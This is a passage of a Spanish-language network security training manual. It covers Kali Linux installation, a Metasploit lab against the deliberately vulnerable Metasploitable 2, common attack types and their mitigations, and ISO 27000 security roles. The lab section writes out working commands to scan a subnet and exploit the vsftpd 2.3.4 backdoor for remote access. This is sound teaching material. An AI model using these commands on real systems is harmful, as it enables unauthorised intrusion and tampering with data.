Manual de Seguridad de Redes II

TABLA DE CONTENIDO:
TAREA 01 ENTENDER LA IMPORTANCIA DE LA SEGURIDAD EN LA EMPRESA. ............. 5

TAREAS PRÁCTICAS: ................................................................................................. 6
EVALUAR EL NIVEL DE SEGURIDAD DE LA RED DE DATOS EN UNA EMPRESA.............. 6
INSTALACIÓN DE KALI: ............................................................................................ 11
INFORMES DE PROBLEMAS DE SEGURIDAD ENCONTRADOS EN LA RED DE DATOS DE
LA EMPRESA: .......................................................................................................... 30
FUNDAMENTO TEÓRICO: ........................................................................................ 31
EVALUAR EL NIVEL DE SEGURIDAD DE LA RED DE DATOS EN UNA EMPRESA............ 31
ATAQUE SMURF ..................................................................................................... 36
INUNDACIÓN TCP/SYN ........................................................................................... 37
PRESENTAR UN INFORME DETALLADO DE LOS PROBLEMAS DE SEGURIDAD
ENCONTRADOS EN LA RED DE DATOS DE LA EMPRESA. ........................................... 38
INFORMES DE PROBLEMAS DE SEGURIDAD ENCONTRADOS EN LA RED DE DATOS DE
LA EMPRESA: .......................................................................................................... 39
TAREA 02: ENTENDER LAS NORMAS Y ESTÁNDARES INTERNACIONALES SOBRE LA
SEGURIDAD DE LA INFORMACIÓN. ......................................................................... 47
TAREAS PRÁCTICAS: ............................................................................................... 48
FUNDAMENTO TEORICO ......................................................................................... 49
ENTENDER LA IMPORTANCIA DE LA APLICACIÓN DE LA FAMILIA DE NORMAS ISO/IEC
27000. .................................................................................................................... 49
ENTENDER LOS ROLES DEL OFICIAL DE SEGURIDAD INFORMÁTICA. ......................... 57
TAREA 03: RECONOCER LOS DIFERENTES TIPOS DE FIREWALL PARA LAS EMPRESAS. 61
IMPORTANCIA DE LOS DIFERENTES TIPOS DE FIREWALL PARA REDES
EMPRESARIALES. .................................................................................................... 62
REALIZAREMOS EL SIGUIENTE PROCEDIMIENTO: .................................................... 63
CONFIGURACIÓN DE LOS PARÁMETROS ASA Y SEGURIDAD DE INTERFAZ CLI .......... 73
CONFIGURAR NAT ESTÁTICA PARA EL SERVIDOR DMZ UTILIZANDO UN OBJETO DE
RED ........................................................................................................................ 77
FUNDAMENTO TEORICO ......................................................................................... 77
ENTENDER LA IMPORTANCIA DE LOS DIFERENTES TIPOS DE FIREWALL PARA REDES
EMPRESARIALES. .................................................................................................... 77
TAREA 04: REALIZAR UNA DESCRIPCIÓN GENERAL DE LOS PRODUCTOS FIREWALL DE
MICROSOFT E INSTALAR LOS MÁS UTILIZADOS. ...................................................... 97
Seguridad de redes II
TAREA 05: IMPLEMENTAR LA ÓPTIMA CONFIGURACIÓN DE LA CACHE DEL

SERVIDOR FIREWALL DE MICROSOFT. ................................................................... 131
TAREA PRÁCTICA: ................................................................................................. 132
CONFIGURANDO PROPIEDADES GENERALES DE LA CACHE Y SUS REGLAS: ............. 132
ENTENDER LA IMPORTANCIA DE LA CACHÉ DEL SERVIDOR PROXY/ FIREWALL. ...... 133
CONFIGURANDO PROPIEDADES GENERALES DE CACHE. ........................................ 135
CONFIGURANDO REGLAS DE CACHE...................................................................... 136
TAREA 06: : IMPLEMENTAR LAS DIRECTIVAS DE FIREWALL MÁS IMPORTANTES. ... 137
CONFIGURANDO REGLAS DE ACCESO PARA LA NAVEGACIÓN EN INTERNET CON UNA
RED PERIMETRAL Y DIRECTIVAS. ........................................................................... 138
FUNDAMENTO TEORICO: ...................................................................................... 141
CONFIGURANDO EL SERVIDOR DE SEGURIDAD COMO UN SERVIDOR PROXY/
FIREWALL CON SOFTWARE DE MICROSOFT. .......................................................... 141
............................................................................................................................ 141
CONFIGURANDO REGLAS DE ACCESO PARA LA NAVEGACIÓN EN INTERNET.......... 142
CONFIGURANDO UNA RED DE PERÍMETRO. .......................................................... 143
CONFIGURANDO UNA RED CON DMZ. .................................................................. 148
CONFIGURANDO DIRECTIVAS DE FIREWALL .......................................................... 153
DIRECTIVAS Y CONJUNTOS DE REGLAS .................................................................. 153
TAREA 07: REALIZAR LA ÓPTIMA CONFIGURACIÓN DEL ACCESO A LOS RECURSOS DE
LA RED INTERNA MEDIANTE LA PUBLICACIÓN DE SERVIDORES. ............................ 157
TAREA 08: REALIZAR LA CONFIGURACIÓN AVANZADA DE FILTROS. ....................... 177
APLICACIONES AVANZADAS Y DESCRIPCIÓN DE FILTRO WEB................................. 178
PARA REALIZAR ESTA TAREA, EJECUTE LOS SIGUIENTES PASOS: ............................ 178
APLICACIONES AVANZADAS Y DESCRIPCIÓN DE FILTRO WEB................................. 180
TAREA 09: CONFIGURAR LA SUPERVISIÓN Y LOS INFORMES UTILIZANDO EL
SERVIDOR FIREWALL DE MICROSOFT. ................................................................... 185
TAREA PRÁCTICA .................................................................................................. 186
CONFIGURANDO ALERTAS: ................................................................................... 186
CONFIGURANDO REPORTES.................................................................................. 188
CONFIGURANDO ALERTAS. ................................................................................... 191
CONFIGURANDO LA SUPERVISIÓN DE SESIONES. .................................................. 192
Escuela de Tecnologías de la Información 2

ADMINISTRAR LA SUPERVISIÓN DE SESIONES ....................................................... 193

CONFIGURAR FILTROS DE LAS SESIONES ............................................................... 193
CONFIGURANDO REPORTES O INFORMES. ............................................................ 194
SUPERVISANDO LA CONECTIVIDAD. ...................................................................... 195
SUPERVISANDO SERVICIOS Y RENDIMIENTO. ........................................................ 196
TAREA 10: REALIZAR LA PROTECCIÓN DE LA RED DE LA EMPRESA UTILIZANDO UN
SERVIDOR DE SEGURIDAD CON LINUX. ................................................................. 199
TAREA PRÁCTICA: ................................................................................................. 200
CONFIGURANDO UNA RED PERIMETRAL CON LINUX. ........................................... 200
FUNDAMENTO TEÓRICO: ...................................................................................... 209
DIFERENTES ESCENARIOS PARA BRINDAR LA SEGURIDAD DE LA RED DE DATOS DE LA
EMPRESA UTILIZANDO UN SERVIDOR LINUX. ........................................................ 209
FIREWALLS PARA LA VIGILANCIA DEL TRÁFICO SALIENTE: ..................................... 210
INSPECCIÓN DEL CONTENIDO DE LA CAPA DE APLICACIÓN .................................... 210
FIREWALLS PARA APLICACIONES WEB .................................................................. 210
IMPLEMENTACIONES DE FIREWALLS VIRTUALES ................................................... 211
CONFIGURANDO UNA RED PERIMETRAL CON LINUX. ........................................... 211
CONFIGURANDO UN SERVIDOR PROXY EN LINUX. ................................................ 225
TAREA 11: IMPLEMENTAR LA SEGURIDAD UTILIZANDO IPTABLES.......................... 229
TAREA PRÁCTICA: ................................................................................................. 230
CREANDO UN FIREWALL CON IPTABLES CON SALIDA HACIA INTERNET Y CON RED
DMZ: .................................................................................................................... 230
ENTENDER EL CONCEPTO E IMPORTANCIA DE LAS IPTABLES ................................. 234
CREANDO UN FIREWALL CON IPTABLES. ............................................................... 235
FIREWALL DE UNA LAN CON SALIDA A INTERNET. ................................................. 238
FIREWALL DE UNA LAN CON SALIDA A INTERNET CON DMZ. ................................. 239
FIREWALL CON POLÍTICA POR DEFECTO DROP. ..................................................... 241
COMO DEPURAR EL FUNCIONAMIENTO DEL FIREWALL. ........................................ 244
TAREA 12: IMPLEMENTAR UNA ÓPTIMA SEGURIDAD EN LAS REDES VPN CON
PRODUCTOS MICROSOFT Y LINUX. ....................................................................... 245
TAREA PRÁCTICA: ................................................................................................. 246
FUNDAMENTOS TEORICOS: .................................................................................. 266
ENTENDER EL FUNCIONAMIENTO DE UNA RED PRIVADA VIRTUAL. ...................... 266
PROTOCOLOS DE TÚNEL ....................................................................................... 266

CONFIGURANDO VPN PARA CLIENTES REMOTOS .................................................. 268

CONFIGURANDO EL SERVIDOR DE SEGURIDAD PARA CONTROLAR Y ADMINISTRAR
LAS VPN EN ENTORNOS MICROSOFT Y LINUX........................................................ 270
CONFIGURANDO EL SERVIDOR DE SEGURIDAD PARA CONTROLAR Y ADMINISTRAR
LAS VPN EN ENTORNO LINUX- CON ENDIAN. ........................................................ 273

01
Tarea 01 Entender la importancia de la seguridad en la empresa.
En esta tarea realizará las siguientes operaciones:
 Evaluar el nivel de seguridad de la red de datos en una empresa.

 Presentar un informe detallado de los problemas de seguridad
encontrados en la red de datos de la empresa.
 “El éxito no es la clave de la felicidad. La felicidad es la clave del

éxito”. Albert Schweitzer
Equipos y Materiales:
 Computadora con microprocesadores core 2 Duo ó de mayor capacidad.

 Sistema operativo Windows.
 Una Máquina virtual con un servidor, que podría ser cualquiera de los
siguientes:
o Servidor Microsoft (Windows Server 2008 o Windows Server 2012)
o Servidor Linux (Centos, Debian o algún otro).
 Software de simulación de redes.
 Software de virtualización de equipos.
Orden de Ejecución:
 Evaluar el nivel de seguridad de la red de datos en una empresa.

 Presentar un informe detallado de los problemas de seguridad
encontrados en la red de datos de la empresa.
TAREAS PRÁCTICAS:
Operación:
Evaluar el nivel de seguridad de la red de datos en una empresa.
Para esta operación, se implementará un laboratorio de prueba para realizar una
demostración de un ataque controlado a la seguridad en una empresa.
Este laboratorio necesitará los siguientes requerimientos:
1. Máquina virtual con el sistema operativo Kali.
2. Máquina virtual con Servidor para pruebas.
Kali Linux es la nueva generación de la distribución Linux BackTrack, la cual se
utiliza para realizar Auditorías de Seguridad y Pruebas de Penetración.
Kali Linux está basada en GNU/Linux Debian y contiene una gran cantidad de
herramientas para capturar información, identificar vulnerabilidades, explotarlas,
escalar privilegios y cubrir las huellas.
Kali Linux es utilizado para realizar Pruebas de Penetración.
Kali Linux contiene una

gran diversidad de
herramientas para
auditorias en seguridad
de la información.
Kali Linux tiene las siguientes características:
 Contiene una diversidad de herramientas de Pruebas de Penetración.

 Es Libre.

 Árbol Git Open Source.

 Cumple con FHS (estándar de jerarquía del sistema de archivos).
 Soporte para dispositivos inalámbricos.
 Entorno de desarrollo seguro.
 Se puede obtener en varios lenguajes.
 Completamente personalizable.
Herramientas de Kali Linux:
Estas herramientas están divididas en categorías:
1. Recopilación de información:
acccheck enum4linux p0f

ace-voip enumIAX Parsero
Amap exploitdb Recon-ng
Automater Fierce SET
bing-ip2hosts Firewalk smtp-user-
enum
braa fragroute
snmpcheck
CaseFile fragrouter
sslcaudit
CDPSnarf Ghost Phisher
SSLsplit
cisco-torch GoLismero
sslstrip
Cookie Cadger goofile
SSLyze
copy-router- hping3
config THC-IPV6
InTrace
DMitry theHarvester
iSMTP
dnmap TLSSLed
lbd
dnsenum twofi
Maltego Teeth
dnsmap URLCrazy
masscan
DNSRecon Wireshark
Metagoofil
dnstracer WOL-E
Miranda
dnswalk Xplico
Nmap
DotDotPwn ntop

2. Análisis de vulnerabilidad:
BBQSQL Greenbone openvas-
Security scanner
BED
Assistant Oscanner
cisco-auditing-
GSD
tool Powerfuzzer
HexorBase
cisco-global- sfuzz
exploiter Inguma SidGuesser
cisco-ocs jSQL SIPArmyKnife
cisco-torch Lynis
sqlmap
copy-router- Nmap Sqlninja
config ohrwurm sqlsus
DBPwAudit openvas-
THC-IPV6
Doona administrator
tnscmd10g
DotDotPwn openvas-cli
unix-privesc-
openvas- check
manager
Yersinia
3. Los ataques inalámbricos:

Aircrack-ng Fern Wifi mfterm
Cracker
Asleap Multimon-NG
Ghost Phisher
Bluelog PixieWPS
GISKismet
BlueMaho Reaver
Gqrx
Bluepot redfang
gr-scan
BlueRanger RTLSDR
kalibrate-rtl Scanner
Bluesnarfer
KillerBee Spooftooph
Bully
Kismet Wifi Honey
coWPAtty
mdk3 Wifitap
crackle
mfcuk Wifite
eapmd5pass
mfoc

4. Aplicaciones WEB:
apache-users joomscan ua-tester
Arachni jSQL Uniscan
BBQSQL Maltego Teeth Vega
BlindElephant PadBuster w3af
Burp Suite Paros WebScarab
CutyCapt Parsero Webshag
DAVTest plecost WebSlayer
deblaze Powerfuzzer WebSploit
DIRB ProxyStrike Wfuzz
DirBuster Recon-ng WPScan
fimap Skipfish XSSer
FunkLoad sqlmap zaproxy
Grabber Sqlninja
jboss-autopwn sqlsus
5. Herramientas de explotación:
Armitage cisco-ocs SET
Backdoor cisco-torch ShellNoob
Factory Commix sqlmap
BeEF crackle THC-IPV6
cisco-auditing- jboss-autopwn Yersinia
tool
Linux Exploit
cisco-global- Suggester
exploiter
Maltego Teeth
6. Herramientas de análisis forense:
Binwalk chntpw ddrescue

bulk-extractor Cuckoo DFF
Capstone dc3dd diStorm3

Dumpzilla iPhone Backup pdgmail

Analyzer
extundelete peepdf
p0f
Foremost RegRipper
pdf-parser
Galleta Volatility
pdfid
Guymager Xplico
Si desease más información puede ingresar a la siguiente fuente:

http://tools.kali.org/.
Una de las herramientas más importantes es NMAP:

Nmap es una herramienta con licencia GPL y gratuita que se utiliza para la
exploración de las redes de datos y la seguridad. Es una aplicación
multiplataforma, ya que se puede instalar sobre Linux, Unix, Windows, Mac, etc.
Nmap es una herramienta utilizada en auditorías de seguridad en empresas,
inventario de los equipos de red, actualización de servicios, monitorización de la
red, etc.
Es una herramienta muy útil para comprobar los puertos abiertos de una
máquina, con el objetivo de detectar posibles vulnerabilidades.
Nmap es un
programa de código
abierto que es
utilizado para efectuar
rastreo de puertos en
un servidor.
Nmap utiliza el siguiente formato:

nmap [Tipo(s) de Análisis] [Opciones] {especificación de objetivos}
Donde:
El objetivo puede ser indicado por nombres de dominio, direcciones IP, redes,
etc.
Las opciones más básicas se encuentran en el siguiente cuadro:
Opción. Acción.
Lee una lista de nombres de
-iL <archivo_entrada>
dominio/redes del archivo.
Selecciona objetivos al azar.
-iR <número de sistemas>
Excluye ciertos sistemas o redes
--exclude <sist1[,sist2][,sist3],...>
Excluye los sistemas indicados en un
--excludefile <fichero_exclusión>
archivo.
Instalación de Kali:
Kali Linux puede ser instalado como cualquier distribución GNU/Linux, puede ser
también instalado en una unidad USB, o instalado en un disco cifrado.
Para realizar la instalación de esta distribución, tenga presente los siguientes
pasos:
1. Descargue el archivo ISO de la dirección:
http://www.kali.org/downloads/
Desde esta página

WEB podremos
descargar el ISO de
Kali.

2. Luego creará una máquina virtual, utilizando VMware.

3. La máquina virtual tendrá las siguientes características:
a. Maquina con un disco duro de 800 GB a más.
b. Se debe realizar en una red protegida y preparada para este fin.
4. Ingresará a VMware y hará clic en “Crear nueva máquina virtual” y definirá
las características de la máquina virtual.
Al crear la máquina
virtual, indicará que luego
instalará el sistema
operativo.
5. Indicará el tipo de máquina virtual:
Indicará que tipo de

sistema operativo se
instalará en la máquina
virtual.
6. Indicará la ubicación en la cual se guardará la máquina virtual:

Indicará la ruta en la que

se guardará la máquina
virtual.
7. Indicará la capacidad del disco duro:
Indicará la capacidad del

disco duro virtual.
8. Realizará las configuraciones de red adecuadas, si no se tiene una red

protegida prevista para este ejercicio, se debe utilizar “NAT” o “Host Only”.
Debe configurar la tarjeta

de red de tal forma que
exista comunicación
entre kali y el equipo al
cual se le evaluará la
seguridad.

9. Se colocará la ruta en la cual se encuentra el ISO de Kali:
Indicará la ruta en la
que se encuentra la
imagen ISO.
10. Se incrementará la memoria para la máquina virtual:
Indicará la cantidad de
memoria en la máquina
virtual.
11. Iniciará la máquina virtual:
12. Seleccione la opción de instalación grafica (Graphical install).

13. Se iniciará el proceso de instalación gráfica.
14. Seleccione el idioma y haga clic en “Continue”:

Seleccionará el
idioma en el que se
instalará Kali.
15. Aparecerá una advertencia con respecto al uso del idioma, haga clic en
“Continuar”:
16. Debe indicar su ubicación, en este caso seleccionará “Perú”:
Seleccionará la ubicación
para que el sistema pueda
fijar correctamente la zona
horaria.

17. Realizará la configuración del teclado, en este caso escogerá

“Latinoamericano”:
18. El equipo tratará de recibir una configuración IP desde un servidor DHCP,

en este caso no se ha instalado un servidor DHCP, haga clic en
“Continuar”:
19. En este caso, debe configurar la red de forma manual, colocando la

dirección IP, mascara, puerta de enlace y DNS:
En este ejemplo, se realizará la

configuración de la red en
forma manual, para lo cual se
debe tener la dirección IP,
mascara y puerta de enlace
para que sea ingresada.
20. Primero ingresará la dirección IP, con la máscara, por ejemplo en este
caso colocará la dirección: 192.168.1.20/24:

21. Ahora ingresará la puerta de enlace:
Desde esta ubicación se irán colocando la

dirección IP del equipo, la mascara, la puerta de
enlace (la pasarela) y posteriormente las
direcciones IP de los servidores DNS.
22. Ahora debe ingresar las direcciones IP de los servidores DNS de la red
de datos:
23. Se realiza un testeo de red inicial:
24. Ingresará el nombre del servidor, en este caso se le colocará de nombre:

Kali:
25. Se colocará el nombre de dominio de la empresa:

26. Se ingresará la contraseña del usuario principal (usuario root):
Aquí se ingresará la contraseña

del usuario root (usuario
administrador del sistema).
27. Definirá la partición de los discos:
28. El sistema le informará que toda la información del Disco se borrará:
29. Escogerá la estructura deseada.

30. Finalizará el particionamiento:
Se creará la tabla de
particionamiento, la cual en
este caso tendrá tres
particiones.
31. Se muestra la tabla de particionamiento final, seleccione “Si” a la consulta:

¿Desea escribir los cambios en los discos?:
Una vez creadas las

particiones, se formatearán
para iniciar la instalación del
sistema.
32. Se iniciará la instalación:
33. Se iniciará la instalación del sistema:

34. Debe configurar el gestor de paquetes y además, debe indicar si se

utilizará una réplica de red, para esto el sistema debe encontrarse en
Internet:
Si se cuenta con Internet, puede

crearse una réplica en red.
35. Si el equipo se encuentra en Internet, se pueden complementar y

actualizar los paquetes instalados en Kali.
36. Se solicitará la dirección del proxy en caso que se utilice en la red:
37. En caso de haberse indicado que se utilizaría la réplica de red, se

analizará la replica:

38. Se empezarán a descargar algunos ficheros:
39. Se instalará el arranque, en este caso se utilizará GRUB:
40. Se escogerá la ubicación en la cual se instalará:
41. Se terminará con la instalación:

42. Se reiniciará la computadora y cargará el sistema.

43. Colocará el usuario root y la contraseña y listo:
Se podrá visualizar el fondo de la

pantalla con el símbolo
representativo de Kali.
44. Se mostrarán varias aplicaciones:
Desde el menú de
aplicaciones podrá
apreciar los diversos
programas que se
incluyeron en la
instalación.
Ahora procederá a instalar Metasploitable 2, que es una máquina creada con

fines académicos, que ya posee varias vulnerabilidades.

El procedimiento es el siguiente:
1. Puede descargar Metasploitable 2 desde el sitio:
http://sourceforge.net/projects/metasploitable/files/Metasploitable2/.
2. Descomprimirá el archivo descargado.
3. Se ingresará a la máquina virtual.
4. Ingresará la cuenta de usuario: msfadmin.
5. Contraseña: msfadmin.
6. Existen diferentes estándares para realizar pruebas de penetración en

redes de datos, que son utilizadas para auditorias en seguridad
informática, siendo uno de los más importantes el indicado en la url:
http://www.pentest-standard.org/index.php/Main_Page.
7. Para realizar una prueba de penetración en una red de datos, es

necesario realizar diferentes etapas. La primera de ellas consiste en
capturar información sobre el sistema objetivo y comúnmente se le
conoce como etapa de reconocimiento. A partir de los datos obtenidos, se
realizarán las siguientes etapas. Una vez que los datos han sido
recopilados y luego de un detallado análisis, se procede a la etapa donde
se realizará la explotación sobre el sistema objetivo. La selección de los
exploits que se utilizarán en la prueba dependerán de la información
obtenida en la etapa anterior. Finalmente, una vez realizado el ataque, se
analiza el impacto producido.
La documentación y la generación de reportes son la parte final de las
pruebas de penetración.
8. Primero se procederá a la captura de información que pueda ser valiosa
para la prueba con fines de auditoria.

9. Primero verificará que la conexión de red en los dos equipos esté

funcionando y que se encuentren en la misma red:
Podrá verificar la
configuración de red
ingresada en el
sistema durante la
instalación:

En la maquina con Metasploitable, la configuración IP puede ser manual

o dinámica.
Si es manual, debe editar el fichero:
Sudo nano /etc/network/interfaces

Con la configuración:
auto eth0
iface eth0 inet static
address 192.168.1.40
netmask 255.255.255.0
gateway 192.168.1.1
10. Reiniciará el servicio:

sudo /etc/init.d/networking restart

Luego verificará la configuración:
11. Ingresará a un terminal desde el sistema Kali e ingresará el comando:

> msfconsole
12. Se abrirá la aplicación:
13. Aparecerá el prompt de Metasploit.

14. Desde este prompt se ingresarán otros comandos.
15. Ingresará el comando:

Nmap –v 192.168.1.0/24

16. Se descubrió la PC con el IP 192.168.1.40 con varios puertos abiertos:
17. El escaneo de la red y de los puertos lo almacenará en una base de datos,

para lo cual utilizará el comando:
db_nmap –v 192.168.1.0/24
18. Para observar la información de forma ordenada, ahora utilizará los

comandos:

Hosts.
Services.
19. Ingresará un comando que muestre información más detallada con

respecto a un puerto:
Db_nmap –sV 192.168.1.40 –p 21
20. Ahora buscará el exploit que permitirá aprovechar la vulnerabilidad, en

este caso buscará el exploit para ftp (vsftpd 2.3.4).

Para esto, utilizará el comando:

Search vsftpd 2.3.4
21. Ahora utilizará este exploit, para lo cual ingresará el comando:
Use exploit/unix/ftp/vsftpd_234_backdoor
Y también: show options:
22. Se nos indica en las opciones, que RHOST es requerido, para ello utilizará
el siguiente comando:
Set RHOST 192.168.1.40
23. Ahora ingresará el comando: exploit y accederemos a los directorios del

servidor ftp atacado:

24. Ahora, ingrese el comando ls y podrá listar los directorios del servidor FTP
e ingresar luego a alguno de ellos y hasta borrar datos o modificarlos:
Operación:
Informes de problemas de seguridad encontrados en la red de datos de la
empresa:
En esta operación, el alumno debe realizar un informe sobre los problemas
relacionados con la seguridad de la información en la empresa en la cual realizan
la complementación de sus estudios prácticos, en caso que no sea posible, se
realizará el informe sobre la seguridad del centro de estudios o de lo indicado
por el instructor.

Luego de este informe, el alumno debe realizar un pequeño proyecto de mejora

para resolver estos problemas de seguridad.
FUNDAMENTO TEÓRICO:
Operación:
Evaluar el nivel de seguridad de la red de datos en una empresa.
Existen diferentes puntos vulnerables en una red de datos, lo cual dependerá de
los servicios que se presten a los usuarios.
En este sentido aparece el concepto de “superficie de ataque del sistema” que
es el subconjunto de los recursos del sistema que un atacante puede utilizar para
perpetrar el ataque. Un atacante puede utilizar los puntos de entrada, los puntos
de salida, canales, y elementos de datos no confiables para enviar (recibir) los
datos en (de) el sistema para realizar el ataque (Manadhata, 2008).
Según Amaya Calvo, en informática, ‘superficie de ataque’ o ‘attack surface’ es
un concepto que refleja la exposición que un sistema tiene ante amenazas.
Podemos definir la ’superficie de ataque’ como la parte del sistema que está
sujeta a interacciones con usuarios sin autenticar.
El ataque informático puede realizarse desde diferentes frentes y consiste en
aprovechar algunas debilidades o fallas en el software, en el hardware, así como
debilidades en las personas que forman parte del sistema, a fin de obtener un
beneficio, comúnmente de tipo económico, causando un efecto negativo en la
seguridad del sistema, que puede generar pérdidas importantes en la
organización.
Para evaluar el nivel de seguridad en una empresa, se deben conocer los

diferentes tipos de ataques que se pueden presentar, ya que esto le otorgará la
ventaja de aprender a pensar como los atacantes y no deberá subestimarlos.
Tipos de ataques:
1. Ataques utilizando virus, gusanos y troyanos:
Las principales vulnerabilidades de las computadoras de los usuarios
finales se presentan debido a los ataques de virus, gusanos y troyanos.
Como recordará, un virus es un software malicioso que se agrega a otro
programa para ejecutar una función determinada que ocasionará un
problema en una computadora.
Un gusano es un software que ejecuta un determinado código e instala
copias de sí mismo en la memoria de la computadora infectada, que luego
infecta a otros hosts en la red.

Para dejar clara la diferencia entre virus y gusanos informáticos, debe

tener en cuenta que los virus requieren un programa huésped para
ejecutarse, mientras que los gusanos pueden ejecutarse solos, de tal
forma que no requieren la participación del usuario y pueden diseminarse
muy rápidamente, explotando las vulnerabilidades en las redes.
Un troyano es una aplicación que se parece a otra o se hace pasar por
otra. Cuando se descarga y ejecuta un troyano, ataca a la computadora
del usuario final desde el interior.
Los troyanos se clasifican de la siguiente forma:
a. Troyano de denegación de servicios de red (reduce la velocidad o

detiene la actividad en la red).
b. Troyanos de Acceso Remoto que le permiten al intruso realizar un
acceso remoto no autorizado.
c. Troyano que convierte al equipo en un proxy, por el cual se
trasladarán los paquetes enviados por las otras PCs.
d. Troyano para envío de datos
desde el equipo de la víctima,
que provee al atacante de
datos sensibles como las
contraseñas de los usuarios
legítimos.
e. Troyano para corrupción y
eliminación de archivos.
f. Troyano FTP, que permite la
apertura del puerto 21.
g. Troyano que puede detener
los programas antivirus y/o
firewalls.
El principal recurso para la disminución de los ataques de virus, gusanos

y troyanos es el software antivirus. El software antivirus permite prevenir
que los hosts sean infectados y evitar la diseminación del código
malicioso. Actualmente, los productos de antivirus cuentan con una
consola de administración con la cual se pueden ver reportes detallados
sobre la presencia de los virus, gusanos o troyanos en los equipos de toda
la red.

2. También existen metodologías de ataque que no son a través de virus,

gusanos y troyanos.
Entre estas metodologías tenemos:
a. Ataques de Reconocimiento:
Los ataques de reconocimiento tienen como base el descubrimiento y
mapeo de los sistemas, servicios o vulnerabilidades. Los ataques de
reconocimiento pueden utilizar:
 Sniffers de paquetes
 Barridos de ping
 Escaneo de puertos
 Búsquedas de información en Internet.
Debemos tener en cuenta que los ataques de reconocimiento son
generalmente precursores a otros ataques, tales como los
ataques de acceso.
Para disminuir estos tipos de ataque, se pueden utilizar los siguientes
procedimientos:
 Implementar autenticación para evitar el acceso no autorizado.
 Utilizar cifrado para que los ataques que utilizan sniffrers no
logren resultados.
 Utilizar aplicaciones antisniffer.
 Utilizar firewalls e IPS.

b. Ataques de acceso:
Los hackers utilizan estos tipos de ataques en las redes o sistemas
por diversas razones, como por ejemplo, para obtener datos, para
ganar acceso y para escalar privilegios de acceso y así poder robar
información muy valiosa.
Los ataques de acceso generalmente emplean ataques que permitan

averiguar las contraseñas utilizadas en el sistema. Los ataques de
acceso pueden ser implementados utilizando diversos métodos, tales
como:
Ataques para descubrir

contraseñas: Como se
indicó anteriormente, el
atacante intenta descubrir
las contraseñas del
sistema, lo cual se puede
hacer a través del ataque
de diccionario y con
aplicaciones tales como
L0phtCrack, o LC5.
Ataque Man in the Middle (Ataque del hombre en el medio): El

atacante se ubica en el medio de una comunicación entre dos equipos
que son legítimos, para leer o modificar los datos que pasan entre las
dos partes con el objetivo de causar problemas en la empresa. Un
ataque de este tipo comúnmente involucra a una laptop actuando
como un punto de acceso no autorizado para capturar y copiar todo el
tráfico de red de un usuario o equipo determinado.

Redirección de puerto lógico: Se usa un equipo que ya fue tomado

como origen para los ataques contra otros objetivos en la red.
Desbordamiento de buffer: El
programa escribe datos más allá
de la memoria de buffer permitida.
Los desbordamientos de buffer
surgen generalmente como
consecuencia de un error en un
programa generado en lenguaje
C, C++, etc. Un resultado del
desbordamiento es que los datos
válidos se sobre escriben para
permitir la ejecución de código malicioso.
Para disminuir los ataques de acceso, se pueden utilizar los siguientes

procedimientos:
 Utilizar contraseñas fuertes.

 Confianza mínima a los usuarios.
 Utilizar criptografía.
 Parches y actualizaciones de los sistemas operativos y
aplicaciones.
c. Ataques de Denegación de Servicio:
Es un ataque de red que consiste en

interrumpir el servicio a los usuarios,
dispositivos o aplicaciones. Muchos
mecanismos pueden generar un
ataque de este tipo. El método más
simple es generar grandes cantidades
de tráfico de red. Este tipo de ataque
de DoS satura la red para que el tráfico
de usuario válido no pueda pasar.

Un ataque de DoS puede hacer que

se envíen paquetes de grandes
tamaños que no son esperados por
la aplicación receptora en la red.
Además aparece un tipo de ataque

denominado Denegación
Distribuida de Servicio (DDoS) que
es similar a un ataque DoS, excepto
que un ataque DDoS se origina en
múltiples fuentes coordinadas por lo
tanto es un ataque más sofisticado.
Algunos ejemplos de ataques de denegación de servicios son:

El ping de la muerte
En este tipo de ataque, el atacante envía una solicitud de eco

utilizando el comando “ping”, pero el paquete IP es más grande que
el tamaño de paquete máximo de 65535 bytes, el hacer esto puede
hacer colapsar la computadora objetivo.
Ataque Smurf
En este tipo de ataque, el hacker envía un gran número de solicitudes

ICMP a direcciones de difusión (broadcast), todas estas solicitudes se
hacen con direcciones de origen falsificadas de la misma red en la
que se encuentra la computadora de la víctima. Si el dispositivo de
comunicaciones envía el tráfico a esas direcciones de broadcast,
todos los host de la red destino enviarán respuestas ICMP, lo cual
ocasionaría el gran aumento del tráfico por cada host en la red.

Inundación TCP/SYN
En este tipo de ataque, se envía una inundación de paquetes SYN

TCP, comúnmente con una dirección de origen falsa. Cada paquete
se asume como una solicitud de conexión, causando que el servidor
genere una conexión a medio abrir devolviendo un paquete SYN-ACK
TCP y esperando un paquete de respuesta de la dirección del
remitente que se supone que hizo la solicitud. Sin embargo, como la
dirección origen de la solicitud es falsa, la respuesta nunca llega.
Estas conexiones que se quedan a medio abrir saturan el número de
conexiones disponibles que el servidor puede atender, haciendo que
este no pueda responder a solicitudes reales hasta que el ataque haya
terminado.

Para disminuir los ataques de DoS, se pueden utilizar los siguientes

procedimientos:
 ISP y Firewalls.
 Tecnologías para evitar las falsificaciones.
 Implementar Calidad de Servicio.
Operación:
Presentar un informe detallado de los problemas de seguridad encontrados
en la red de datos de la empresa.
Actualmente, en las empresas es vital que se tenga un gran cuidado con la
seguridad de la información, por lo tanto existen algunas normas que podrían
ayudar a obtener un óptimo nivel de seguridad.
En las empresas medianas y grandes se utiliza la familia de normas
internacionales ISO 27000.
Como se puede apreciar en la imagen siguiente, hay varias normas en la familia
ISO 27000:
Según estas normas, la organización de la seguridad se debe establecer con las

siguientes entidades:
1. CGSI: Comité de gestión de seguridad de la información.
2. COSI: Comité técnico de seguridad de la información.

Además se deben contar con los siguientes roles:

1. OSI: Oficial de seguridad de la información.
2. SI: Responsable seguridad informática.
Con respecto a los profesionales en seguridad, estos deben estar en constante

actualización y capacitación, para lo cual existen algunas organizaciones que se
preocupan por esto, inclusive algunas de estas otorgan certificaciones para los
profesionales que superen ciertas pruebas, entre estas organizaciones tenemos:
 SysAdmin, Audit, Network, Security (SANS) Institute.

 Computer Emergency Response Team (CERT).
 International Information Systems Security Certification Consortium
((ISC)2 se dice "I-S-C-squared" en inglés).
 First.
 Mitre Corporation.
Informes de problemas de seguridad encontrados en la red de datos de la

empresa:
Como se pudo ver en la sección anterior, la seguridad de la información en una
empresa debe seguir una serie de procesos, debe encontrarse sistematizada
donde todo el personal de la empresa debe estar comprometidos en su
cumplimiento.
La seguridad de la información no solo basta en instalar un firewall y listo, abarca
mucho más.
Lamentablemente en nuestro país no es muy común encontrar instituciones que
implementen un sistema de seguridad
adecuado.
En la mayoría de empresas, sobre todo en
las pequeñas y medianas no toman el
tema de seguridad de la información como
un factor importante para la continuidad
del negocio, inclusive en algunas
ocasiones no desean implementar
políticas de seguridad porque lo toman
como un gasto innecesario.
